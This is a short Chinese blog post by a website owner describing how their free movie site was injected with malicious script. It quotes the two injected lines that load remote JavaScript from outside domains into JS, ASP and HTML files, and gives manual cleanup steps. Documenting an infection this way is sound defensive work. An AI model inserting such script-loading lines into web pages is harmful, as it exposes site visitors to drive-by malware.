在门户通那边开设的就要免费电影站,今天遭遇挂马事件,也许是所用的程序太过简单,网上搜索发现有很多的后门。

再加上自己的密码设置的过于简单,不曾想今天打开以后杀毒软件就报警了,还好顺藤摸瓜找到了源头。

具体症状:几乎所有的js文件都被添加了以下一段代码:document.writeln ("<script src="http://vawh5.cn"></script>");

大部分asp和html文件后面被添加了如下的代码:<script src=http://mdsfd.cn></script>

这个马真是相当可恶,可以衍生出很多的恶意网站来,源头就是被加入了上面两段代码。

附上具体解决方法:

用Ftp从服务器上下载你的站点文件到本地,然后下载个“文本替换专家”软件,查找出所有被添加了恶意代码的文件,然后删除。

最后下载个木马检测器,确认所有的恶意代码全部被清除以后,上传覆盖你的源文件即可。

这项的工作量是相当庞大的,目前没有找出什么好的解决方法来,只能暂时这么对付啦!